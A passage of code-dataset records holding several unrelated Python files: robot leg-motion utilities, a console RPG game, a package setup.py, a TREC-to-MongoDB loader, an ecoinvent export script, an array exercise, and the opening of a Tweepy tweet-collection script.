self.get_linear_3d_mid_motion_vals(xyz0, xyzf, i, imax)\n R = MathUtils.mid_motion_rotation_matrix(xyzR0[3], xyzRf[3], i, imax)\n return xyz+[R]\n\n def get_parabolic_mid_motion_xyzR(self, xyzR0, xyzRf, i, imax, step_height):\n\n xyz0 = xyzR0[0:3]\n xyzf = xyzRf[0:3]\n xyz = self.get_parabolic_mid_motion_xyz(xyz0, xyzf, i, imax, step_height)\n R = MathUtils.mid_motion_rotation_matrix(xyzR0[3], xyzRf[3], i, imax)\n return xyz+[R]\n\n # --------------- End of New Code\n\n def get_support_triangle_from_stance_idx(self, stance_idx, name=None):\n stance = self.stance_path[stance_idx]\n fl_xyz, fr_xyz, br_xyz, bl_xyz = self.get_end_affector_xyzs_from_curr_stance(stance)\n\n support_triangle_points = [fl_xyz, fr_xyz, br_xyz, bl_xyz]\n support_triangle_points.pop(stance[4] - 1)\n\n moving_leg = self.get_moving_leg(stance)\n if moving_leg == 1:\n diag_points = [True, False, True]\n elif moving_leg == 2:\n diag_points = [True, True, False]\n elif moving_leg == 3:\n diag_points = [False, True, True]\n elif moving_leg == 4:\n diag_points = [True, False, True]\n else:\n Logger.log(\"moving leg unrecognized\", \"FAIL\")\n diag_points = []\n exit()\n\n next_support_tri = self.get_support_triangle_from_points(support_triangle_points, diag_points, name=name)\n return next_support_tri\n\n def get_moving_leg(self, stance):\n return stance[4]\n\n def get_moving_leg_from_stance_idx(self, stance_idx):\n stance = self.stance_path[stance_idx]\n return self.get_moving_leg(stance)\n\n def get_end_effector_range_circles(self, stance_idx, visualize=False, ignore_leg=None, only_include_current_holds=False):\n stance = self.stance_path[stance_idx]\n fl_xyz_current, fr_xyz_current, br_xyz_current, bl_xyz_current = self.get_end_affector_xyzs_from_curr_stance(stance)\n current_fs_holds = [fl_xyz_current, fr_xyz_current, br_xyz_current, bl_xyz_current]\n current_end_effectors = [1, 2, 3, 4]\n if not ignore_leg:\n if not only_include_current_holds:\n stance_next = self.stance_path[stance_idx + 1]\n fl_xyz_next, fr_xyz_next, br_xyz_next, bl_xyz_next = self.get_end_affector_xyzs_from_curr_stance(stance_next)\n next_fs_holds = [fl_xyz_next, fr_xyz_next, br_xyz_next, bl_xyz_next]\n next_end_effectors = [1, 2, 3, 4]\n new_hold = [next_fs_holds[stance[4] - 1]]\n next_end_effector = [next_end_effectors[stance[4] - 1]]\n end_effectors = current_end_effectors + next_end_effector\n all_holds = current_fs_holds + new_hold\n else:\n end_effectors = current_end_effectors\n all_holds = current_fs_holds\n else:\n end_effectors = current_end_effectors\n end_effectors.pop(ignore_leg-1)\n current_fs_holds.pop(ignore_leg-1)\n all_holds = current_fs_holds\n ranges = []\n for i in range(len(all_holds)):\n end_effector = end_effectors[i]\n point = all_holds[i]\n circle_ = self.get_end_effector_2D_range_circle(end_effector, at_point=point)\n ranges.append(circle_)\n if visualize:\n circle_.visualize()\n return ranges\n\n def get_torso_z_des_from_xy(self, torso_xy, curr_state, debug=False):\n\n # TODO: This requires more consideration\n\n fl_xyzc, fr_xyzc, br_xyzc, bl_xyzc = self.get_end_affector_xyzs_from_curr_stance(curr_state)\n end_eff_zs = np.array([fl_xyzc[2],fr_xyzc[2],bl_xyzc[2], br_xyzc[2]])\n z_endeff_ave = np.average(end_eff_zs)\n z_env = self.height_map.height_at_xy(torso_xy[0], torso_xy[1])\n min_torso_clearance = project_constants.MIN_TORSO_CLEARANCE\n torso_z_des = project_constants.TORSO_Z_DESIRED\n\n # if debug: print \"z_env:\", z_env, \"\\tz_endeff_ave:\", z_endeff_ave, \"\\tz_endeff_stddev:\", z_endeff_stddev, \"\\t z_endeff_ave + min_torso_clearance:\",logger.pp_double(z_endeff_ave + min_torso_clearance)\n # note: THis will cause torso z 'jumps' if the torso goes over an obstacle which goes above the torso clearance\n if z_env > z_endeff_ave + min_torso_clearance:\n z_ret = z_env + min_torso_clearance\n # if debug: print \"z_env > z_endeff_ave + min_torso_clearance \\tz:\",logger.pp_double(z_ret)\n else:\n z_ret = z_endeff_ave + torso_z_des\n # if debug: print \"z_ret = z_endeff_ave + torso_z_des :\\t\",logger.pp_double(z_ret)\n return z_ret\n\n def adjust_endeff_z(self, xyz):\n offset = project_constants.END_EFFECTOR_HEIGHT\n # z = self.height_map.height_at_xy(xyz[0], xyz[1])\n xyz_new = [xyz[0], xyz[1], xyz[2] + offset]\n return xyz_new\n\n def print_state_list(self):\n for stance in self.stance_path:\n print(\"\\n \", stance)\n print(\" \", Logger.pp_list(self.scatter_list[stance[0]]), \", \", Logger.pp_list(\n self.scatter_list[stance[1]]), \", \", Logger.pp_list(self.scatter_list[stance[2]]), \", \", Logger.pp_list(\n self.scatter_list[stance[3]]))\n\n def get_optimized_torso_xy_yaw_deg(self, current_support_tri, static_range_circles, moving_end_eff_xyz, current_average_xy_yaw_deg, ignore_moving_end_eff=False, debug=False):\n\n outbound_limiter = 100\n outbound_scaler = 5.0\n inbound_scalar = 1.0\n\n def cost(xy_yaw_deg):\n torso_x = xy_yaw_deg[0]\n torso_y = xy_yaw_deg[1]\n torso_xy = [torso_x, torso_y]\n torso_yaw_rad = np.deg2rad(xy_yaw_deg[2])\n torso_xy_shapely_point = Point(torso_x, torso_y)\n\n if not ignore_moving_end_eff:\n moving_end_eff_range_circle_radius = self.get_torso_range_from_end_effector(4, at_point=moving_end_eff_xyz, yaw_rads=torso_yaw_rad)\n moving_end_eff_range_circle = LegRange(moving_end_eff_xyz, moving_end_eff_range_circle_radius, self.height_map)\n range_circles = static_range_circles + [moving_end_eff_range_circle]\n else:\n range_circles = static_range_circles\n\n if not current_support_tri.point_is_inside(torso_xy):\n dist = current_support_tri.get_shapely_poly().boundary.distance(torso_xy_shapely_point)\n cost = outbound_scaler * dist + outbound_limiter\n #print \" - outbound valus:\", logger.pp_list(xy_yaw_deg), \"has cost:\", cost\n return cost\n\n dist = 0\n for range_circle in range_circles:\n dist += range_circle.get_shapely_poly().distance(torso_xy_shapely_point)\n cost = inbound_scalar * dist\n #print \" - inbound valus:\", logger.pp_list(xy_yaw_deg), \"has cost:\", cost\n return cost\n\n ret_obj = optimize.minimize(cost, current_average_xy_yaw_deg)\n ret_val = np.ndarray.tolist(ret_obj.x)\n\n if cost(ret_obj.x) > outbound_limiter - .01:\n if debug:\n Logger.log(\"Error, could not find xy inside of support triangle\", \"FAIL\")\n print(ret_obj)\n return False\n else:\n if ret_obj.success:\n #print \"get_optimized_torso_xy_yaw_deg(): success! returning:\",ret_val\n return ret_val\n else:\n Logger.log(\"Error, could not find xy inside of support triangles, range circles\", \"FAIL\")\n return False\n\n def get_end_effector_2D_range_circle(self, end_effector, circle_name = None, at_point=None, yaw_rads=None):\n\n '''\n @summary returns a _2DLegRadius object given the end effectors name\n @param link_name: string specifiing the link name\n @param circle_name: name of circle\n @return: _2DLegRadius object\n '''\n\n r = self.get_torso_range_from_end_effector(end_effector, at_point=at_point, yaw_rads=yaw_rads)\n global_xyz = self.get_end_effector_from_end_effector_number(end_effector).getWorldPosition([0,0,0])\n if at_point:\n global_xyz = at_point\n return LegRange(global_xyz, r, self.height_map, name=circle_name)\n\n def get_support_triangle_from_points(self, P, diag_points, name=None):\n '''\n @summary returns a SupportTriangle created by the parameterized array of Points\n @param P: list of xyz coordinates\n @return: SupportTriangle object\n '''\n support_tri = SupportTriangle(P, self.height_map, diag_points, name=name)\n support_tri.enforce_safety_margin(project_constants.SUPPORT_TRIANGLE_SAFETY_MARGIN)\n return support_tri\n\n def get_centroid_from_multiple_poly_intersections(self, support_triangles, add_z=None, closest_to=None):\n if len(support_triangles) < 2:\n Logger.log(\"Error: support_triangles have less than two objects\", \"FAIL\")\n return False\n first_obj = support_triangles[0]\n rest = support_triangles[1:]\n ret = first_obj.xy_centroid_from_o_3dgeoms(rest, closest_to=closest_to)\n if add_z:\n ret = [ret[0], ret[1], add_z]\n return ret\n\n def get_current_torso_xy_yaw_deg(self):\n q = self.robosimian.getConfig()\n xyz_yaw = [q[0], q[1], np.rad2deg(q[3])]\n return xyz_yaw\n\n def get_current_torso_xyz_yaw_deg(self):\n q = self.robosimian.getConfig()\n xyz_yaw = [q[0], q[1], q[2], np.rad2deg(q[3])]\n return xyz_yaw\n\n def get_linear_3d_mid_motion_vals(self, start, end, _i, _i_max):\n x_delta = end[0] - start[0]\n y_delta = end[1] - start[1]\n z_delta = end[2] - start[2]\n try:\n x = start[0] + (_i / _i_max) * x_delta\n except ZeroDivisionError:\n x = start[0]\n try:\n y = start[1] + (_i / _i_max) * y_delta\n except ZeroDivisionError:\n y = start[1]\n try:\n z = start[2] + (_i / _i_max) * z_delta\n except ZeroDivisionError:\n z = start[2]\n return [x, y, z]\n\n def get_parabolic_mid_motion_xyz(self, startXYZ, endXYZ, i, i_max, step_height):\n\n # prevents division by 0\n if i == 0: i = 1\n\n x_start = float(startXYZ[0])\n y_start = float(startXYZ[1])\n z_start = float(startXYZ[2])\n\n x_end = float(endXYZ[0])\n y_end = float(endXYZ[1])\n z_end = float(endXYZ[2])\n\n x_delta = x_end - x_start\n y_delta = y_end - y_start\n z_delta = z_end - z_start\n delta_xy_total = MathUtils._3d_euclidian_distance( [x_start,y_start,0], [x_end, y_end, 0] )\n\n x = x_start + (float(i) / float(i_max) * x_delta)\n y = y_start + (float(i) / float(i_max) * y_delta)\n z = z_start + (float(i) / float(i_max) * z_delta)\n delta_xy = MathUtils._3d_euclidian_distance([x,y,0],[x_start,y_start,0])\n\n height_offset = 0\n if delta_xy_total > .0001:\n height_offset = (-4*step_height*delta_xy*(delta_xy-delta_xy_total)) / delta_xy_total\n # see https://www.desmos.com/calculator/v8wb6o83jh\n return [ x, y, z + height_offset ]\n\n def get_torso_rotation_matrix_from_yaw_deg(self, yaw_deg):\n curr_yaw_deg = self.get_current_torso_yaw_deg()\n offset = yaw_deg - curr_yaw_deg\n return self.get_torso_rotation_matrix_from_yaw_deg_offset(offset)\n\n def get_current_torso_yaw_deg(self):\n q = self.robosimian.getConfig()\n deg = np.rad2deg(q[3])\n return deg\n\n def get_current_torso_yaw_rads(self):\n return self.robosimian.getConfig()[3]\n\n def get_torso_rotation_matrix_from_yaw_deg_offset(self, yaw_offset_deg):\n current_torso_yaw_rad = self.get_current_torso_yaw_rads()\n desired_torso_yaw_rad = current_torso_yaw_rad + np.deg2rad(yaw_offset_deg)\n axis_angle = ([0,0,1], desired_torso_yaw_rad)\n desired_r = so3.from_axis_angle(axis_angle)\n return desired_r\n\n #TODO: Update to include non level/flat end effectors\n def get_torso_range_from_end_effector(self, end_effector, at_point=None, yaw_rads=None):\n R = project_constants.END_AFFECTOR_RADIUS_TO_SHOULDER\n S = project_constants.SHOULDER_TORSO_XY_EUCLIDEAN_DIF\n yaw = self.get_current_torso_yaw_rads()\n if yaw_rads: yaw = yaw_rads\n psi = project_constants.SHOULDER_TORSO_PSI_RADS\n shoulder_link = self.get_shoulder_from_end_effector(end_effector)\n shoulder_world_xyz = shoulder_link.getWorldPosition([0, 0, 0])\n if end_effector == 1:\n link_global_xyz = self.fl_end_effector.getWorldPosition([0, 0, 0])\n if at_point:\n link_global_xyz = at_point\n leg_dx = shoulder_world_xyz[0] - link_global_xyz[0]\n leg_dy = shoulder_world_xyz[1] - link_global_xyz[1]\n theta = np.arctan2(leg_dy, leg_dx)\n delta_y_max = R * np.sin(theta) + (- S * np.cos((np.pi / 2) - (yaw + psi)))\n delta_x_max = R * np.cos(theta) + (- S * np.sin((np.pi / 2) - (yaw + psi)))\n elif end_effector == 4:\n link_global_xyz = self.bl_end_effector.getWorldPosition([0, 0, 0])\n if at_point:\n link_global_xyz = at_point\n leg_dx = shoulder_world_xyz[0] - link_global_xyz[0]\n leg_dy = shoulder_world_xyz[1] - link_global_xyz[1]\n theta = np.arctan2(leg_dy, leg_dx)\n delta_y_max = R * np.sin(theta) + (- S * np.sin(psi - yaw))\n delta_x_max = R * np.cos(theta) + (S * np.cos(psi - yaw))\n elif end_effector == 2:\n link_global_xyz = self.fr_end_effector.getWorldPosition([0, 0, 0])\n if at_point:\n link_global_xyz = at_point\n leg_dx = shoulder_world_xyz[0] - link_global_xyz[0]\n leg_dy = shoulder_world_xyz[1] - link_global_xyz[1]\n theta = np.arctan2(leg_dy, leg_dx)\n delta_y_max = R * np.sin(theta) + S * np.sin(yaw - psi - np.pi)\n delta_x_max = R * np.cos(theta) + S * np.cos(yaw - psi - np.pi)\n else:\n link_global_xyz = self.br_end_effector.getWorldPosition([0, 0, 0])\n if at_point:\n link_global_xyz = at_point\n leg_dx = (shoulder_world_xyz[0] - link_global_xyz[0])\n leg_dy = (shoulder_world_xyz[1] - link_global_xyz[1])\n theta = np.arctan2(leg_dy, leg_dx)\n delta_y_max = R * np.sin(theta) + S * np.sin(yaw + psi)\n delta_x_max = R * np.cos(theta) + S * np.cos(yaw + psi)\n r = np.sqrt(delta_x_max ** 2 + delta_y_max ** 2)\n return project_constants.END_RANGE_MULTIPLIER * r\n\n def get_torso_R_from_yaw_rad(self, yaw_rad):\n axis_angle = ([0, 0, 1], yaw_rad)\n desired_r = so3.from_axis_angle(axis_angle)\n return desired_r\n","sub_path":"src/motion/motion_utils.py","file_name":"motion_utils.py","file_ext":"py","file_size_in_byte":44711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"326105526","text":"# ===========================\n# IMPORT MODULES\n# ===========================\n\nfrom example.classes.game import Person, Bcolors, Game\nfrom example.classes.magic import Spell\nfrom example.classes.inventory import Item\nimport random\nimport time\n\n# ========================================\n# INSTANTIATE SPELLS, PLAYERS, ITEMS\n# ========================================\n\n# Create Dark Magic\n# ----------------------\nfire = Spell(\"Fire\", 10, 100, \"dark\")\nthunder = Spell(\"Thunder\", 10, 100, \"dark\")\nblizzard = Spell(\"Blizzard\", 10, 100, \"dark\")\nmeteor = Spell(\"Meteor\", 20, 200, \"dark\")\nquake = Spell(\"Quake\", 12, 120, \"dark\")\n\n# Create Light Magic\n# ----------------------\ncure = Spell(\"Cure\", 12, 120, \"light\")\ncura = Spell(\"Cura\", 18, 200, \"light\")\n\n# Create some items\n# ----------------------\npotion = Item(\"Potion\", \"potion\", \"Heal 50 HP\", 50, 20)\nhi_potion = Item(\"Hi-potion\", \"potion\", \"Heal 100 HP\", 100, 10)\nsuper_potion = Item(\"Super Potion\", \"potion\", \"Heal 500 HP\", 500, 5)\nelixer = Item(\n \"Elixer\", \"elixer\", \"Fully restores HP & MP of one party's member\", 99999, 1\n)\nmega_elixer = Item(\n \"Mega Elixer\", \"elixer\", \"Fully restores HP & MP of all party's members\", 99999, 1\n)\ngrenade = Item(\"Grenade\", \"attack\", \"Deal 500 damage\", 500, 2)\n\n# Instantiate Players & Teams\n# -----------------------\nmagic = [fire, thunder, blizzard, meteor, cure, cura]\nitems = [potion, hi_potion, super_potion, elixer, mega_elixer, grenade]\n\nprint(\n \"\"\"{}\nThis is a 3v3 RPG game, the rule is simple, just try to defeat your enemies.\nEach player takes turn to choose an enemy to attack, then choose what kind of attack you want\nor item you want to use and hit.\nFirst, choose your team members' name{}\n\"\"\".format(\n Bcolors.BOLD, Bcolors.ENDC\n )\n)\n\nplayer1_name = input(f\"{Bcolors.BOLD}{Bcolors.OKBLUE}First Player Name: {Bcolors.ENDC}\")\nplayer2_name = input(\n f\"{Bcolors.BOLD}{Bcolors.OKBLUE}Second Player Name: {Bcolors.ENDC}\"\n)\nplayer3_name = input(f\"{Bcolors.BOLD}{Bcolors.OKBLUE}Third Player Name: {Bcolors.ENDC}\")\n\nplayer1 = Person(player1_name.upper(), 500, 65, 60, 34, magic, items)\nplayer2 = Person(player2_name.upper(), 460, 65, 60, 34, magic, items)\nplayer3 = Person(player3_name.upper(), 460, 65, 60, 34, magic, items)\nenemy1 = Person(\"GREMLIN\", 1200, 65, 50, 25, magic, items)\nenemy2 = Person(\"BANSHEE\", 1200, 65, 50, 25, magic, items)\nenemy3 = Person(\"VAMPIRE\", 1200, 65, 50, 25, magic, items)\n\nteam = [player1, player2, player3]\nteam2 = [enemy1, enemy2, enemy3]\n\ngame = Game(team, team2)\n\n\nprint(\"===============================================\\n\")\nprint(\"{}{}PLAYERS' TEAM:{}\\n\".format(Bcolors.BOLD, Bcolors.OKGREEN, Bcolors.ENDC))\nfor pl in team:\n pl.get_stats(True)\nprint()\nprint(\"===============================================\\n\")\nprint(\"{}{}ENEMIES' TEAM:{}\\n\".format(Bcolors.BOLD, Bcolors.FAIL, Bcolors.ENDC))\nfor enm in team2:\n enm.get_stats(False)\nprint()\nprint(\"===============================================\\n\")\nrunning = True\n\n\n# ========================================\n# START GAME LOOP\n# ========================================\nplayer_dead = []\nbot_dead = []\nif __name__ == \"__main__\":\n while running:\n\n # Human's turn\n\n for mem in team:\n # Player name\n print(\"\\t{}{}{}\".format(Bcolors.BOLD, mem.name, Bcolors.ENDC))\n\n # Select Target\n print(\"\\t Target an enemy now !\")\n game.team_list(team2)\n target = game.get_choice(input(\"\\t Choose target: \"))\n try:\n enemy = team2[target]\n except (ValueError, IndexError, TypeError):\n print(\"Type the number only !\")\n continue\n\n # Select action\n mem.choose_action()\n select = input(\"\\t Choose action: \")\n\n # Start the fight\n game.turn(mem, enemy, select, True)\n game.check_hp(team2)\n # DELAY\n print(\"=================================\")\n print(\"{0}ENEMIES'S TURNS{1}\".format(Bcolors.BOLD, Bcolors.ENDC))\n time.sleep(2)\n\n for mem2 in team2:\n # Select action\n select2 = random.randrange(1, 4)\n # Select Target\n if len(team) > 0:\n target2 = random.randrange(len(team))\n bot_target = team[target2]\n\n # Start the fight\n game.turn(mem2, bot_target, select2, False)\n game.check_hp(team)\n else:\n print(\"{0}All Dead ! Enemies Win{1}\".format(Bcolors.BOLD, Bcolors.ENDC))\n running = False\n time.sleep(1)\n\n print(\"=================================\")\n for pl in team:\n pl.get_stats(True)\n print()\n for enm in team2:\n enm.get_stats(False)\n print()\n print(\"=================================\")\n\n if len(team) == 0:\n print(\"{} You lost! {}\".format(Bcolors.FAIL, Bcolors.ENDC))\n running = False\n elif len(team2) == 0:\n print(\n \"{}{} You win! {}\".format(Bcolors.BOLD, Bcolors.OKGREEN, Bcolors.ENDC)\n )\n running = False\n","sub_path":"example/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"59850275","text":"from distutils.core import setup\nfrom os import path\n\nROOT = path.dirname(__file__)\nREADME = path.join(ROOT, 'README.rst')\n\nsetup(\n name='hurl',\n py_modules = ['hurl'],\n url='https://github.com/oinopion/hurl',\n author='Tomek Paczkowski & Aleksandra Sendecka',\n author_email='tomek@hauru.eu',\n version='1.1.dev',\n license='New BSD license',\n long_description=open(README).read(),\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"127043435","text":"from __future__ import with_statement \nimport parser\nimport logging\nfrom pymongo import MongoClient\nimport gzip \nimport ConfigParser \nimport argparse\nimport os\n\n'''\nThe program reads contents from TREC collections and store them in a mongoDB after\na compression (using gzip). Usually, the collections are aparted into bag of words which break\nthe orginal structure and make a loss of syntactic information. So this can help\nto obtain the orginal contents and conduct a semantic/syntactic research in the future.\n\nUsage: trec2mongo.py --config [configFileName]\n\nThe default config file is in the same folder as this program with the name \"config.txt\"\nIn the config file, the following settings should be determined:\n\n1. MongoDB connection settings, including mongoDB server (default \"localhost\"),\nmongoDB server port(default \"27017\"), database name (default \"trec\"), \ncompress level(default 5).\n\n2. TREC collection settings, including the name of a file which contains the list\nof collection file names with full path, collection name (wt2g, wt10g, blog, gov2...)\n\nA tradition config file is like:\n\n[mongoDB]\nhost = localhost\nport = 27017\ndbname = trec\nDBcollection = wt2g\ncompressLevel = 5\n\n[Trec]\ntrecCollectionFiles =\ntrecCollectionName = wt2g\n\n'''\n#Read config files\ndef readconfig(configFile):\n\tsettings = {}\n\tconfig=ConfigParser.ConfigParser()\n\tconfig.readfp(configFile)\n\thost = config.get(\"mongoDB\", \"host\")\n\tport = config.get(\"mongoDB\", \"port\")\n\tdbname = config.get(\"mongoDB\", \"dbname\")\n\tDBcollection = config.get(\"mongoDB\", \"DBcollection\")\n\tcompressLevel = config.get(\"mongoDB\", \"compressLevel\")\n\n\ttrecCollectionFiles = config.get(\"Trec\", \"trecCollectionFiles\")\n\ttrecCollectionName = config.get(\"Trec\", \"trecCollectionName\")\n\n\tsettings[\"host\"] = host\n\tsettings[\"port\"] = port\n\tsettings[\"dbname\"] = dbname\n\tsettings[\"DBcollection\"] = DBcollection\n\tsettings[\"compressLevel\"] = compressLevel\n\tsettings[\"trecCollectionFiles\"] = trecCollectionFiles\n\tsettings[\"trecCollectionName\"] = trecCollectionName\n\n\treturn settings\n\n\n\n\n\n\n\n#Connect to the database\n\n#Read collection files one by one and store them in the database\nlogging.basicConfig(level=logging.INFO,\n\t\t\t\tformat='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n\t\t\t\tdatefmt='%a, %d %b %Y %H:%M:%S',\n\t\t\t\tfilename='trec2mongo.log',\n\t\t\t\tfilemode='w')\n\n\nconParser = argparse.ArgumentParser(description='read contents from trec collections and store them in a mongoDB database')\nconParser.add_argument('--config', dest='config_file', action='store',default = 'config.txt',\n help='full path to the config file')\n\n#print os.getcwd()\nconfig = {}\nargs = conParser.parse_args()\nconfigFilePath = args.config_file\nwith open(configFilePath, 'r') as configFile:\n\tconfig = readconfig(configFile)\n\nlogging.info(\"Loading configurations...\")\nif(config[\"host\"] is None):\n\thost = \"localhost\"\nelse:\n\thost = config[\"host\"]\n\nif(config[\"port\"] is None):\n\tport = int(config[\"port\"])\nelse:\n\tport = int(\"27017\")\n\nif(config[\"dbname\"] is None):\n\tdbname = \"trec\"\nelse:\n\tdbname = config[\"dbname\"]\n\nif(config[\"DBcollection\"] is None):\n\tDBcollection = \"wt2g\"\nelse:\n\tDBcollection = config[\"DBcollection\"]\n\nif(config[\"compressLevel\"] is None):\n\tcompressLevel = int(config[\"compressLevel\"])\nelse:\n\tcompressLevel = int(\"5\")\n\nif(config[\"trecCollectionFiles\"] is None):\n\tlogging.warning(\"The trec collection file is missing\")\n\texit(1)\nelse:\n\ttrecCollectionFiles = config[\"trecCollectionFiles\"]\n\nif(config[\"trecCollectionName\"] is None):\n\tlogging.warning(\"The trec collection name is missing\")\n\texit(1)\nelse:\n\ttrecCollectionName = config[\"trecCollectionName\"]\n\nlogging.info(\"Loading configurations successfully\")\n\n#Connect to the database\n\nclient = MongoClient(host, port)\nif client is None:\n\tlogging.warning(\"Databased connection failed\")\n\texit(1)\n\ndb = client[dbname]\ndbcol = db[DBcollection]\n\nlogging.info(\"Starting to processing collection \" + trecCollectionName)\nif trecCollectionName.lower() == \"wt2g\":\n\twith open(trecCollectionFiles, 'r') as colFiles:\n\t\tfor colFile in colFiles:\n\t\t\twith gzip.open(colFile.strip(),'r') as wt2gFile:\n\t\t\t\tparser.wt2g(wt2gFile, dbcol, compressLevel)\n\t\t\t\tlogging.info(\"File \" + colFile.strip() + \" is done \\n\")\n\n\nclient.close()\n\n\n\n\n\n","sub_path":"Python/trec2mongoDB/trec2mongo.py","file_name":"trec2mongo.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"196950804","text":"# -*- coding: utf-8 -*-\nimport utils, pyprind, excel_template, os\nimport spold2_reader as spold2\nversion = '3.4'\nsystem_model = 'Undefined'\nfolder = utils.version_system_model_path(version, system_model)\nao = utils.pkl_load(os.path.join(folder, 'pkl'), 'ao')\nao = ao[ao['geography'] == 'RER']\nao = ao[ao['activityName'] == 'treatment of waste glass from unsorted public collection, sorting']\nfilelist = list(set(ao['filename']))\ndataset_folder = os.path.join(folder, 'datasets')\ndatasets = [spold2.Dataset(dataset_folder, filename)\n for filename in pyprind.prog_bar(filelist, title = 'loading dataset')]\nresult_folder = r'C:\\Dropbox (ecoinvent)\\ei-int\\technical\\external\\PEF\\PEF_chemicals\\technical\\output'\nresult_filename = 'cullet.xlsx'\nexcel_template.assemble_for_templates(datasets, result_folder, result_filename)","sub_path":"projects/PEF_correction/cullet.py","file_name":"cullet.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"368325654","text":"if __name__ == '__main__':\n \n A = [3, 1, 4, 7, 5, 100, 10]\n B = []\n lent = 0\n\n for i, elem in enumerate(A):\n if i < len(A)-1:\n B.append(A[i+1]-A[i])\n lent += 1\n \n print(B)\n\n curr_diff = B[0]\n for i in range(lent-1):\n k = i+1\n if B[i] > 0:\n temp = B[i] + B[k]\n B[k] = temp\n curr_diff = max(curr_diff, temp)\n else:\n curr_diff = B[k]\n\n \n print(curr_diff)\n\n'''\n\nExplanation:\n\nProblem:\nFind max difference in an array. for ex: if array = [3, 1, 4, 7, 5, 100, 10], \nwe can see that 100 - 1 = 99 would be the max difference possible.\n\nLogic:\nSimple approach can be, O(n^2) where for each elem take minus of all other \nand keep updating the max_difference.\n\nIn this program, we first found out the max diff subarray. Now from that, \nwe applied algo as follows:\nmaintain 2 pointers i and k, where k = i+1\niterate of B and if first elem is negative, curr_diff should be kth elem\nif the elem is +ve then add the itk and kth and store at kth,\nnow find the max of curr_diff and kth elem newly updated and store in curr_diff\n\nHow logic works:\nso if you check properly, in above series of steps, we did,\na[2]-a[1]+a[3]-a[2]+a[4]-a[3]+a[5]-a[4] = a[5]-a[1] = 100-1 = 99\nthink mathematically\n\n'''","sub_path":"Misc/Arrays/max_diff_in_given_array.py","file_name":"max_diff_in_given_array.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"638811393","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"\nCreated on Sun Dec 20 18:40:33 2020\n\nThis script allows the user to collects dehydrated and hydrated tweets from\nTwitter accounts.The default Twitter accounts were selected by hand. \nFeel free to change the ones selected in this script. Tweets extractions is\naccomplish using Tweepy. More information in print_usage().\n\nRequirements:\n -> tweepy (pip install -U -q tweepy)\n -> emoji (pip install -U -q emoji)\n -> github (pip install -U -q PyGithub)\n -> tqdm (pip install -U -q tqdm)\n -> requests_oauthlib (pip install -U -q requests-oauthlib)\n -> pymongo (pip install pymongo)\n \nFurthermore, you should have a GitHub account and a Twitter Developer API \ncredentials. Contact me if you want to use our Twitter API. \n\n@author: Álvaro Huertas García\n\"\"\"\n# !pip install -U -q tweepy\n# !pip install -U -q emoji\n# !pip install -U PyGithub\n# !pip install -U -q tqdm\n\nimport pandas as pd\nimport time\nimport datetime\nimport os\nfrom optparse import OptionParser\nimport sys\nimport json\nfrom pymongo import MongoClient\n\n\ntry:\n import tweepy\n import emoji\n from github import Github\n from github import InputGitAuthor\n from tqdm import tqdm\n from requests_oauthlib import OAuth1Session\n \nexcept ImportError as error:\n print(error)\n print(\"\"\"Requirements:\n -> tweepy (pip install -U -q tweepy)\n -> emoji (pip install -U -q emoji)\n -> github (pip install -U -q PyGithub)\n -> tqdm (pip install -U -q tqdm)\n -> requests_oauthlib (pip install -U -q requests-oauthlib)\n -> pymongo (pip install pymongo)\"\"\")\n sys.exit()\n \n\n# Process command-line options\nparser = OptionParser(add_help_option=False)\n\n# General options\nparser.add_option('-h', '--help', action='store_true', help='Show this help message and exit.')\nparser.add_option('-t', '--today', action='store_true', help='Collect tweets from today')\nparser.add_option('-d', '--day', type='int', help='Number of days to go back in time to collect tweets')\nparser.add_option('-c', '--count', type= 'int', help = 'Number of tweets collected per user. Directly related with computing time.')\nparser.add_option(\"--tweets_source_info\", action = 'store_true', help = \"Information. Show the Twitter accounts used for the tweets extraction\")\nparser.add_option(\"--git_token\", type= \"str\", help = \"Token needed to access the Github repository where the results will be saved\")\nparser.add_option(\"--git_repo\", type = \"str\", help = \"Repository where you want to save the json file generated after tweet extraction\")\nparser.add_option(\"--git_autor\", type = \"str\", help = \"GitHub changes author\")\nparser.add_option(\"--git_autor_email\", type = \"str\", help = \"E-mail from the author\")\nparser.add_option('--api_key', type='str', help='Consumer key')\nparser.add_option('--api_secret_key', type='str', help='Consumer secret key')\nparser.add_option('--access_token', type='str', help='Access token')\nparser.add_option('--access_token_secret', type='str', help='Secret access token')\nparser.add_option('--save_local', action='store_true', help='Bool. If data should be save locally')\nparser.add_option('--local_path', type=\"str\", default =\"../local_tweets/\", help='Bool. If data should be save locally')\nparser.add_option('--mongo_user', type='str', help=\"MongoDB user\")\nparser.add_option('--mongo_pass', type='str', help=\"MongoDB password\")\nparser.add_option('--mongo_dbname', type='str', help=\"MongoDB database name\")\nparser.add_option('--mongo_collection', type='str', help=\"MongoDB collection name\")\n\n(options, args) = parser.parse_args()\n\ndef print_usage():\n print(\"\"\"\nInformation:\n This script allows the user to collects dehydrated and hydrated tweets from\n Twitter accounts. The user has several options to save the data extracted: \n locally, on GitHub, on MongoDB. To save locally use --save_local and --local_path\n commands. To save on GitHub use --git_token and --git_repo commands. To save\n the data on MongoDB use --mongo_user, --mongo_pass, --mongo_dbname, --mongo_collection.\n \n \n The default Twitter accounts were selected by hand. \n Feel free to change the ones selected in this script. Tweets extractions is\n accomplish using Tweepy. Hydrated tweets are saved locally. Dehydrated tweets\n are the ones uploaded to GitHub. Nevertheless, the user decides if tweets\n should be saved locally (and the path desired) or saved on GitHub (and the\n repository desired). \n \n Be aware of the \"Rate Limits\" from Twitter. Among these limits, the number of\n tweet extraction requests is up to 450 in a temporal window of 15 minutes. \n Once the 